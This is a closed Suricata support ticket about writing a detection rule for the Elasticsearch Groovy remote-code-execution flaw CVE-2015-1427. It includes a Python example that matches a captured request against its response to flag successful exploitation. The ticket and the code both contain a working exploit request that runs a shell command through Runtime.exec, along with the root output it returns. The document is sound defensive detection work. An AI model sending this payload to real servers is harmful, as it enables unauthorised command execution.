Support #4235 (closed): how to match request content keywords on response
Description
When I wrote a rule to detect CVE-2015-1427 (Elasticsearch Groovy RCE), I ran into some problems.
For example, the request looked like this:
POST /_search?pretty HTTP/1.1
Host: 192.168.2.177:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
The response looked like this:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 406

{
  "took" : 631,
  "timed_out" : false,
  "_shards" : { "total" : 5, "successful" : 5, "failed" : 0 },
  "hits" : {
    "total" : 1,
    "max_score" : 1.0,
    "hits" : [ {
      "_index" : "website",
      "_type" : "blog",
      "_id" : "AXWr4FMqhzelIzbx09av",
      "_score" : 1.0,
      "fields" : { "lupin" : [ "uid=0(root) gid=0(root) groups=0(root)\n" ] }
    } ]
  }
}
I just wrote a rule using content keywords: content:"script_fields"; content:"lang"; content:"groovy"; content:"script"; content:"Runtime"; content:"exec";
Because the keyword "lupin" can be changed to something random, I think of using a regex like this:
\"script_fields\": {(.*?):{\"lang\":\"groovy\",\"script\":
It works well when tested on https://regex101.com/

How can I use the result of regex group 1 to match against the response content? Is there any way or variable to do this (can Suricata pcre do this)?
Using this, I could accurately detect that this HTTP request and response was a successful attack, rather than only alerting on an attempted attack.
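Added example (not from the ticket, not Suricata code): the detection logic the poster describes, written out in Python so the request/response correlation can be tested offline. It pulls the caller-chosen `script_fields` name out of the request with a whitespace-tolerant version of the regex above (group 1), parses the response JSON and only reports success when that same name comes back under `hits[].fields` with non-empty output. The sample request and response are constructed from the ones quoted in the ticket (headers trimmed); the function names are my own.

```python
import json
import re

# Request-side pattern, generalised from the ticket's regex so that optional
# whitespace around ':' and ',' does not break the match. Group 1 captures the
# attacker-chosen script_fields name ("lupin" in the ticket). Assumes a single
# script field; multiple fields would need re.finditer.
SCRIPT_FIELD_RE = re.compile(
    r'"script_fields"\s*:\s*\{\s*"([^"]+)"\s*:\s*\{\s*"lang"\s*:\s*"groovy"\s*,\s*"script"\s*:'
)


def http_body(message: str) -> str:
    """Return the body of a raw HTTP message (everything after the first blank line)."""
    head, sep, body = message.partition("\r\n\r\n")
    if not sep:  # tolerate LF-only captures
        head, sep, body = message.partition("\n\n")
    return body


def groovy_field_name(request: str):
    """Capture group 1 (the script_fields key) from the request body, or None."""
    m = SCRIPT_FIELD_RE.search(http_body(request))
    return m.group(1) if m else None


def field_values(response: str, name: str):
    """Collect the string values returned for script field `name` in the response hits."""
    try:
        doc = json.loads(http_body(response))
    except ValueError:  # not JSON, e.g. an HTML error page
        return []
    values = []
    for hit in doc.get("hits", {}).get("hits", []):
        for v in hit.get("fields", {}).get(name, []) or []:
            if isinstance(v, str):
                values.append(v)
    return values


def exploit_succeeded(request: str, response: str) -> bool:
    """True only when the request carried a Groovy script field AND the response
    echoes command output under that same (captured) field name."""
    name = groovy_field_name(request)
    if name is None:
        return False
    return any(v.strip() for v in field_values(response, name))


# Constructed sample traffic, taken from the ticket with headers trimmed.
REQUEST = (
    "POST /_search?pretty HTTP/1.1\r\n"
    "Host: 192.168.2.177:9200\r\n"
    "Content-Type: application/text\r\n"
    "\r\n"
    '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": '
    '"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"id\\").getText()"}}}'
)

RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json; charset=UTF-8\r\n"
    "\r\n"
    '{"took": 631, "timed_out": false, "hits": {"total": 1, "hits": [{"_index": "website", '
    '"_id": "AXWr4FMqhzelIzbx09av", "fields": {"lupin": ["uid=0(root) gid=0(root) groups=0(root)\\n"]}}]}}'
)


if __name__ == "__main__":
    print("captured field:", groovy_field_name(REQUEST))
    print("successful exploit:", exploit_succeeded(REQUEST, RESPONSE))
```

The request-side match alone only tells you an attempt was made; it is the second step, looking up the captured name in the response, that separates a successful execution from a blocked or failed one. Renaming the field in the request (or a response that lacks the field) makes the check fall back to "no success".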